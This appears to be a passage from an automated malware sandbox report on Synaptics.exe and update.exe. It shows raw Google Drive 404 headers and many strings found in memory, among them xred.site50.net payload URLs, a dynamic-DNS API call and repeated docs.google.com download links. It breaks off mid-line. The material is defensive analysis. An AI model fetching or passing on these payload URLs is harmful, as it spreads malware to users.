                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC54KiVpcBu2nY65JLIaFtSEo6_qKzKFnfwMGWpZeZtP6dDcTNlU6k5W4-D70jCtlbz37ge_EasContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-l5sNE6-RkMlz5NugYVCoTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7tFm43SHQ8M_hkHIYNGOOkx9yROYvcLACVCTuKJlD5JTkymPyBpeH6z8Rzhb1RFr1kTBVgsUIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:37 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Px0bYMPCmrCj2T7PnXR1Jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5YPc1ULt8QZ-Us8tJ_EIOQD20fJ2C6WMFqK58Gcy3JtlPGbuOb1jjVKUFMKlVynchRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:37 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-edkOwu2j-iEUONHPmvuOiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7KspgTarYC98GTxCEEfemMoteZyUovq4tHirlllT1B9zoR1H8Kp42fGTIvxRwih4q6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:41 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-bLwLag8mvozZL2YTB9cKQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mib
                                Source: Synaptics.exe, 00000010.00000002.2211766552.0000000000675000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.dr String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978/T
                                Source: Synaptics.exe, 00000010.00000002.2211766552.0000000000675000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978O
                                Source: ._cache_update.exe, 0000000F.00000002.2555338528.0000000001776000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip-score.com/checkip/rentControlSet
                                Source: update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.dr String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                                Source: Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.dr String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                                Source: update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini0$
                                Source: Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.dr String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                                Source: Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
                                Source: Synaptics.exe, 00000010.00000002.2299504453.000000001D6AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/...
                                Source: Synaptics.exe, 00000010.00000002.2296543685.000000001D60F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/4
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/6Smr;
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/INKr
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/google.com/
                                Source: Synaptics.exe, 00000010.00000002.2246970703.000000000C23E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2269548547.000000001163E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2331551344.000000002713E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2285525995.00000000193FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2274954141.000000001417E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                                Source: Synaptics.exe, 00000010.00000002.2252749844.000000000E67E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXG
                                Source: update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                                Source: Synaptics.exe, 00000010.00000002.2213454335.00000000021A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                                Source: update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloH
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2275849788.0000000014A3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2335526800.0000000028DFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2275275421.000000001453E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2342554669.000000002B4BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2337881203.0000000029BBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2217867035.00000000054DE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2307245600.000000001F23E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2285911384.00000000197BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2279313032.000000001647E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2287219190.000000001A43E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2240136052.000000000967E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2317415263.000000002367E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2270306006.0000000011FBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2286563882.0000000019DFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2286925884.000000001A1BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2238160491.0000000008B3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2237242285.000000000863E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2284630990.0000000018DBE000.00000004.00000010.00020000.00000000.sdmp, 
Synaptics.exe, 00000010.00000002.2329308587.00000000264BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2328445487.0000000025FBE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#KVr
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#_
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#p
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#u
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$Dbyj
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$Ib
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%4
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%N
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%Y
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%i
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000752C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.000000000756C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&9
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&DQr_
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&HSs
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&d
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(5
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(A
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(Gfv
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(Hf
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(d
                                Source: Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)y
                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-9
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-HDs
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-u6e
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-x
                                Source: Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                                Source: Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.K
                                Source: Synaptics.exe, 00000010.00000002.2211766552.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download._
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn0
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2255302411.000000000E9B1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.000000000064D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/:
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/F
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/v
                                Source: Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004E76000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 